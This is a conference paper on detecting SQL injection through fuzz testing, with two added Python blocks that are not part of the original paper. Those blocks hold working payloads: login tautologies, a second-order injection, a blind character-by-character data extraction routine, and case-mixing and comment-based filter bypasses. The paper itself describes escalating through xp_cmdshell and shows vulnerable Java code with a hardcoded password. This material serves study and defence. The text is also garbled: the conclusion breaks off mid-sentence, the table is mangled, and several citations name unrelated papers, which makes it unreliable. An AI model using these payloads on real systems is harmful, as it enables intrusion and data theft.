2024 International Seminar on Artificial Intelligence, Computer Technology and Control Engineering (ACTCE)
979-8-3315-2171-4/24/$31.00 ©2024 IEEE | DOI: 10.1109/ACTCE65085.2024.00046
Research on Threat Detection of SQL Injection Attacks in Large Scale Web Applications

Qinghao Li, Zhida Guo, Xiaoli Li, Ling Zhao, Haobin Shen, Yunsi Jiang
Huizhou Power Supply Corporation of Guangdong Power Grid Co., Ltd., Huizhou, China
E-mail: 136367198@[Link], 107367195@[Link], 1396962588@[Link], 138967198@[Link], 107324755@[Link], 13456812588@[Link]
Abstract-Web applications are exposed to conventional (first-order) SQL injection, second-order injection and blind injection while in operation, which threatens system data, user privacy and other sensitive data. To reduce the impact of SQL injection vulnerabilities, a fuzz testing (fuzzing) based vulnerability detection technique for Web applications and servers is proposed, and a framework for a fuzz-testing SQL injection vulnerability detection model is established. The framework's information collection module and fuzz detection module are used together with keyword encoding, mixed-case encoding and SQL comment insertion to construct the parameter queries and to detect level 0, level 1 and level 2 vulnerabilities hierarchically, through detection steps such as restructuring and bypassing. Finally, an experimental environment built from software and hardware such as ASP.NET, Microsoft Visual Studio and an IIS server is used to demonstrate the fuzz-testing based SQL injection vulnerability detection model. The simulation results show that, compared with the detection method for Web application source code based on program slicing, the fuzz-testing based model is validated at the different vulnerability levels and detects more of the injection threats (over 90%).

Keywords-Web application; SQL injection attacks; fuzz testing method; threat detection

I. INTRODUCTION

SQL injection is one of the most serious security risks to Web applications. Attackers typically use vectors such as server variables, cookies and second-order injection when users submit input to a Web application, so that the structured query built from that input is modified (first-order SQL injection). Alternatively, the second-order injection payload is stored in the database and is not executed immediately; the attack is launched only when a later SQL statement reads the stored data. To address this problem, this paper uses a fuzz-testing SQL injection vulnerability detection model to detect and analyse SQL injection attacks against vulnerabilities of different levels, so as to improve the detection accuracy of SQL injection attacks in Web applications.

II. HOW SQL INJECTION ATTACKS ARE IMPLEMENTED

A. Conventional SQL injection

By the way they are carried out, SQL injection attacks can be divided into conventional injection, second-order injection, blind injection and others. A conventional SQL injection attack modifies the SQL statement that the database executes, or embeds the updatexml() function in the vulnerable statement to provoke an error that discloses data from the database (error-based injection) [1]. updatexml() takes the parameters xml_document, XPathstring and new_value: xml_document is the XML value to modify, XPathstring is the XPath expression locating the part to replace, and new_value is the replacement. In error-based injection the attacker supplies a deliberately malformed XPath string that contains a subquery; the database rejects the call and echoes the subquery's result in its error message. The attack therefore relies on the database reporting a function-argument error back to the application: the conventional injection first finds a query whose error text is returned, then extends the modification of the statement by inserting updatexml() into it. Note that updatexml() exists in MySQL; SQL Server has no such function, and error-based injection there relies on other functions whose conversion errors echo the injected value.

B. SQL second-order injection

A second-order SQL injection attack is defined by contrast with first-order injection. In first-order injection the malicious characters are written directly into an SQL statement. After inserting and modifying the
malicious string in the SQL statement, the tainted data propagates from the source (the input) to the sink (the point where the statement is executed). When an external user submits the request carrying the malicious statement, the injection is triggered immediately. A second-order injection attack instead escapes the malicious string so that it is written to the database as ordinary data without executing anything; the attack fires only when a later SQL statement reads the stored data and uses it, that is, when the application builds another statement from the stored malicious string. The injection is thus triggered indirectly.

C. SQL blind injection

In blind SQL injection the client sends injected request statements to the server and infers the page and SQL information needed for the attack from the "true or false" behaviour of the server's responses [2-4]. If the Web application does not filter the request variables, they can be used to forge HTTP header values and modify the SQL statement, including the user input fields and the cookie contents. When the modified statement is executed on the server, data in the back-end database may even be deleted, completing the blind injection attack.

III. EXECUTION FLOW OF SQL INJECTION ATTACK

An SQL injection attack inserts special characters into a system form or URL query string to construct an illegal SQL statement, which is passed to the Web application as an input parameter and flows from the source to the sink [3-6]. When the server executes the illegal statement, the attacker's chosen operation runs against the relational database. The details differ between relational databases. The execution flow is as follows:

(1) Determine whether the Web application can be injected. No injection is possible when a user merely browses the URL list and static page content of a Web application; injection is possible only where stored page data is queried dynamically from the database.

(2) Find the injection point. After confirming that a page can be injected, take a query with special parameters, such as "select * from books", supply the test statement at the location where the SQL parameters are passed, and locate the injectable parameter. The parameter is injectable when appending the conditions "and 1=1" and "and 1=2" produces different results: the page is unchanged for "and 1=1" but changes or returns an error for "and 1=2".

(3) Determine the database type. Different relational databases require different injection techniques; SQL Server, MySQL and Access, for example, are attacked differently, so the database type must be determined before launching the injection.

(4) Extend permissions. After the database type is known, expand the user's permissions to access and manipulate the database. For SQL Server [7-8], for example, check whether the injection point supports stacked (multi-statement) queries. If the application connects with the highest privilege (the sa system administrator account) and the xp_cmdshell extended stored procedure is available, operating-system shell commands can be executed through it to complete the permission expansion. If the account is not sa, the boolean (true/false) error query and judgement method is used, together with the obtained SQL Server table names and URL list, to determine the permission field values of the user and expand the permissions from there.

IV. SIMULATION EXPERIMENT AND RESULT ANALYSIS

To verify the effectiveness of fuzz-testing based SQL injection vulnerability detection, an experimental environment was built from software and hardware such as ASP.NET, Microsoft Visual Studio, an IIS server and a SQL Server database. The BSQL Hacker automatic injection tool was used to carry out the Web injection attacks against the Web applications. The detection effect for the different levels of SQL injection attack, and the fuzz-testing based detection model itself, were demonstrated on an on-campus library Web management program (JSPLibrary).

The library Web management program (JSPLibrary) has 55 tested files and 3352 lines of back-end code. For first-order SQL injection, the back-end code of the Web application is preprocessed as input and then the test cases of the different vulnerability levels are applied. The collected information, such as the acquired URL list and the HTML pages, is searched and filtered, and the number of suspected first-order SQL injection paths is detected by matching characters against the test cases. Then, starting from the suspected first-order paths, the operation pairs of second-order SQL injection attacks are obtained according to the sequential access rules on the files' logical addresses. The detected second-order SQL injection threats are shown in Table 1.
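The three injection classes of Section II and the "and 1=1" / "and 1=2" probe of step (2) in Section III, as an added Python example that is not part of the paper: it builds a small in-memory SQLite database (standing in for the MySQL or SQL Server back ends the paper discusses) with constructed users and books tables, shows a first-order tautology against a concatenated login query beside its parameterised form, a second-order payload that is stored harmlessly and fires only when a later statement reuses it, and the boolean probe. It goes one step beyond the text by extracting a stored value character by character from nothing but true/false page differences, which is what the blind injection of Section II.C amounts to in practice. The table names, accounts and payloads are this example's own assumptions.

```python
import sqlite3


def make_db():
    """Constructed sample data: a users table like the one the paper's login code queries, plus books."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer primary key, user text, password text, display text)")
    conn.executemany("insert into users (user, password, display) values (?, ?, ?)",
                     [("admin", "s3cret", "Administrator"), ("bob", "hunter2", "Bob")])
    conn.execute("create table books (id integer primary key, title text)")
    conn.executemany("insert into books (title) values (?)", [("Networks",), ("Databases",)])
    conn.commit()
    return conn


# --- first-order injection: input concatenated into the statement text (the pattern of Section V) ---
def login_vulnerable(conn, user, password):
    sql = f"select id from users where user = '{user}' and password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, user, password):
    # Parameterised form: the values are bound separately and are never parsed as SQL.
    sql = "select id from users where user = ? and password = ?"
    return conn.execute(sql, (user, password)).fetchone() is not None


# --- second-order injection: the payload is stored safely and fires when a later statement reuses it ---
def register(conn, user, password, display):
    # Registration binds its parameters, so a display name containing quotes is accepted as plain data.
    conn.execute("insert into users (user, password, display) values (?, ?, ?)", (user, password, display))
    conn.commit()


def lookup_by_display_vulnerable(conn, user):
    # The stored display name is read back and concatenated into a new statement: the second-order sink.
    display = conn.execute("select display from users where user = ?", (user,)).fetchone()[0]
    return conn.execute(f"select user, password from users where display = '{display}'").fetchall()


def lookup_by_display_safe(conn, user):
    display = conn.execute("select display from users where user = ?", (user,)).fetchone()[0]
    return conn.execute("select user, password from users where display = ?", (display,)).fetchall()


# --- blind injection: only a true/false difference in the page is observed ---
def book_page_vulnerable(conn, book_id):
    # Numeric URL parameter (as in ?id=1) concatenated without quotes.
    row = conn.execute(f"select title from books where id = {book_id}").fetchone()
    return row[0] if row else ""


def book_page_safe(conn, book_id):
    row = conn.execute("select title from books where id = ?", (book_id,)).fetchone()
    return row[0] if row else ""


def is_injectable(page, param):
    # Step (2) of Section III: injectable when "and 1=1" leaves the page unchanged but "and 1=2" changes it.
    base = page(param)
    return page(f"{param} and 1=1") == base and page(f"{param} and 1=2") != base


def extract_blind(page, param, subquery, max_len=32):
    # Boolean-based blind extraction: recover the subquery's result one character at a time through
    # yes/no questions; unicode(substr(...)) is NULL past the end of the string, which ends the loop.
    truth = page(param)
    out = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            probe = f"{param} and unicode(substr(({subquery}), {pos}, 1)) = {code}"
            if page(probe) == truth:
                out += chr(code)
                break
        else:
            break
    return out


if __name__ == "__main__":
    db = make_db()
    print("tautology login:", login_vulnerable(db, "' or 1=1 --", "x"), login_safe(db, "' or 1=1 --", "x"))
    register(db, "mallory", "pw", "x' or user = 'admin")
    print("second-order:", lookup_by_display_vulnerable(db, "mallory"), lookup_by_display_safe(db, "mallory"))
    vuln = lambda p: book_page_vulnerable(db, p)
    print("injectable:", is_injectable(vuln, "1"), is_injectable(lambda p: book_page_safe(db, p), "1"))
    print("blind:", extract_blind(vuln, "1", "select password from users where user = 'admin'"))
```

The parameterised versions are not "filtered" at all: they are immune because the database receives the statement text and the values on separate channels, so the same payloads that log in as anyone, leak the admin row or answer the blind probes simply return nothing.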
Table 1. Detection result of the number of first-order and second-order SQL injection attack threats

Columns: home address (source file); database table; first-order SQL injection, number of suspected/confirmed threats; number of attack vectors; second-order injection operation on file; program slicing, number of suspected/confirmed second-order SQL injection threats (detection results).

    [Link]            d_category, d_receive    10/8    249    [Link]
    BookDaoImpl.java      d_book                   12/7
    [Link]            d_user                   4/4

After receiving the data to be tested, extracted by the information collection module, the vulnerability detection module sends a connection request carrying an SQL injection attack to the Web application, based on the test cases of the different vulnerability levels described above: it reads the detection script file from the test case library, starts the injection test, modifies the SQL statement and judges whether the attack succeeded from the feedback to the request. It then checks whether the test case in the script file matches the identifier specific to the URL that suffers this level of SQL injection attack. If the test case matches, a vulnerability of that level exists; otherwise it does not. The detection result is stored in the database, as shown in Figure 1. These steps are repeated until every URL list page of the Web application obtained by the information collection module has been fuzz tested for SQL injection.

V. SQL INJECTION VULNERABILITY INSTANCE

The SQL injection vulnerability code below connects to the database through JDBC and lets the user log in when the user name and password received by the database are correct. The defect being illustrated is that the user name and password are concatenated into the statement text, so they are parsed as part of the query rather than treated as values.

SQL injection vulnerability code (the paper shows only the main method; the class name and imports are supplied here so the listing compiles)

    import java.sql.Connection;
    import java.sql.DriverManager;
    import java.sql.ResultSet;
    import java.sql.Statement;
    import java.util.Scanner;

    public class VulnerableLogin {
        public static void main(String[] args) throws Exception {
            // Load the MySQL JDBC driver and connect with the application's database account.
            Class.forName("com.mysql.jdbc.Driver");
            String url = "jdbc:mysql://localhost:3306";
            String usr = "root";
            String pwd = "123456";
            Connection conn = DriverManager.getConnection(url, usr, pwd);
            Statement stat = conn.createStatement();
            // Read the user name and password typed by the user.
            Scanner sc = new Scanner(System.in);
            usr = sc.nextLine();
            pwd = sc.nextLine();
            // Vulnerable: the raw input is concatenated into the query text (note also the missing
            // quotes and spaces around the values), so whatever the user types becomes SQL.
            String sql = "select * from users where user = " + usr + "and password = " + pwd;
            ResultSet rs = stat.executeQuery(sql);
            rs.close();
            stat.close();
            conn.close();
        }
    }

VI. CONCLUSION

Web applications use the structured query language (SQL) to establish interactive connections with their back-end databases. However, when users access the Web application and the application processes and executes SQL commands, external SQL injection attacks construct specially crafted input to probe the weaknesses in the application's input filtering and validation, with the aim of controlling the server-side Web application and obtaining important data. Therefore, in both first-order and second-order SQL injection attacks, special characters are inserted after the system form or URL query string and illegal data is inserted into the system database and server side, and SQL injection vulnerability attacks by fuzz testing are adopted
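The detection flow described for the fuzz detection module above (baseline request, test cases grouped by level 0/1/2, judgement from the request feedback, result stored in a database, loop over every collected URL), as an added Python example that is not part of the paper's model or code. Two simulated pages stand in for the instance in Section V: one concatenates the parameter after a naive keyword blacklist, the other binds it. SQLite in memory replaces the SQL Server back end; the page names, the blacklist, the benign query and the concrete payloads in each level are this example's own assumptions, only the level hierarchy follows the paper.

```python
import sqlite3
import urllib.parse


def make_site():
    """Constructed back end for the simulated pages: one books table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table books (id integer primary key, title text)")
    conn.executemany("insert into books (title) values (?)",
                     [("Networks",), ("Databases",), ("Compilers",)])
    conn.commit()
    return conn


# Naive case-sensitive keyword blacklist, assumed here to stand in for a weak input filter.
BLOCKED = (" or ", "union", "--")


def search_filtered(conn, q):
    """Simulated page: decodes the URL parameter, applies the blacklist, then concatenates into SQL."""
    q = urllib.parse.unquote(q)
    if any(k in q for k in BLOCKED):
        return ("blocked", [])
    try:
        rows = conn.execute(f"select title from books where title = '{q}'").fetchall()
        return ("ok", [r[0] for r in rows])
    except sqlite3.Error as e:          # a database error leaking into the response
        return ("error", [str(e)])


def search_safe(conn, q):
    """Simulated page with the same parameter passed as a bound value."""
    q = urllib.parse.unquote(q)
    rows = conn.execute("select title from books where title = ?", (q,)).fetchall()
    return ("ok", [r[0] for r in rows])


# Test case library, one list per vulnerability level. The 0/1/2 hierarchy follows the paper;
# the payloads themselves are this example's own.
TEST_CASES = {
    0: ["' or '1'='1", "' or 1=1 --"],                     # plain tautology
    1: ["' oR '1'='1", urllib.parse.quote("' Or '1'='1")],  # mixed case and URL (keyword) encoding
    2: ["'/**/or/**/'1'='1", "'/*a*/oR/*b*/'1'='1"],        # restructured with SQL comments
}


def looks_injected(baseline, resp):
    """Judge the request feedback: an error leaked, or a tautology widened the result set."""
    status, rows = resp
    if status == "error":
        return True
    return status == "ok" and set(rows) > set(baseline[1])


def fuzz_site(conn, handlers, benign="Networks"):
    """Run every level's cases against every collected URL; store each verdict in a results table."""
    results = sqlite3.connect(":memory:")
    results.execute("create table result (url text, level integer, payload text, status text, vulnerable integer)")
    found = {}
    for url, handler in handlers.items():           # URL list from the information collection module
        baseline = handler(conn, benign)             # benign request: the expected feedback
        found[url] = []
        for level, cases in sorted(TEST_CASES.items()):
            hit = False
            for payload in cases:
                resp = handler(conn, payload)
                vulnerable = looks_injected(baseline, resp)
                results.execute("insert into result values (?, ?, ?, ?, ?)",
                                (url, level, payload, resp[0], int(vulnerable)))
                hit = hit or vulnerable
            if hit:
                found[url].append(level)
    results.commit()
    stored = results.execute("select url, level, payload, status, vulnerable from result").fetchall()
    return found, stored


def run_detection():
    conn = make_site()
    handlers = {"/search_filtered": search_filtered, "/search_safe": search_safe}
    return fuzz_site(conn, handlers)


if __name__ == "__main__":
    found, stored = run_detection()
    for url, levels in found.items():
        print(url, "vulnerable at levels", levels)
    print(len(stored), "verdicts stored")
```

Against the blacklisted page the level 0 cases are blocked while the mixed-case and comment-restructured cases of levels 1 and 2 return every row, which is why a detector that stops at level 0 would miss the page; the bound-parameter page fails every case at every level.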
Figure 1. The execution flow of the vulnerability fuzz test module

REFERENCES

[1] Huang Jinhao, Ding Yuzhen, Xiao Liang, et al. A cache scheduling scheme for embedded systems against Denial of Service attacks based on reinforcement learning [J]. Computer Science, 2020(7): 282-286.
[2] Hu Fengsong, Li Cang, Wang Mian, et al. SQL injection detection scheme based on machine learning [J]. Computer Engineering and Design, 2019(6): 1554-1558.
[3] Huang Kunming, Zhang Lei, Zhao Kui, et al. Malicious code detection based on longest frequent sequence mining [J]. Journal of Sichuan University (Natural Science Edition), 2020(4): 681-688.
[4] Dai Wei, Huang Jinjie, Liu Chang. Typical internal network SQL injection attacks and prevention [J]. Network Security Technology and Application, 2020(2): 16-18.
[5] Zhu Jingwen, Xu Jing, Chen Liang, et al. SQL injection attack behavior detection based on Hidden Markov model [J]. Computer Applications and Software, 2023(2): 331-338+344. (in Chinese)
[6] Qin Jinduan, Liu Junliang, Wang Yuebing, et al. SQL injection identification and defense method based on whitelist incremental matching [J]. Cyberspace Security, 2021(Z5): 49-64.
[7] Li B C, Wei J Z, Sun J Z, et al. An efficient GPU cache architecture for applications with irregular memory access patterns [J]. ACM Transactions on Architecture and Code Optimization, 2019, 16(3): 1-24.
[8] Meng J Y, Tarjan D, Skadron K. Dynamic warp subdivision for integrated branch and memory divergence tolerance [C]// Proceedings of the 37th Annual International Symposium on Computer Architecture (ISCA '10), June 19-23, 2010, Saint-Malo, France. New York: ACM Press, 2010.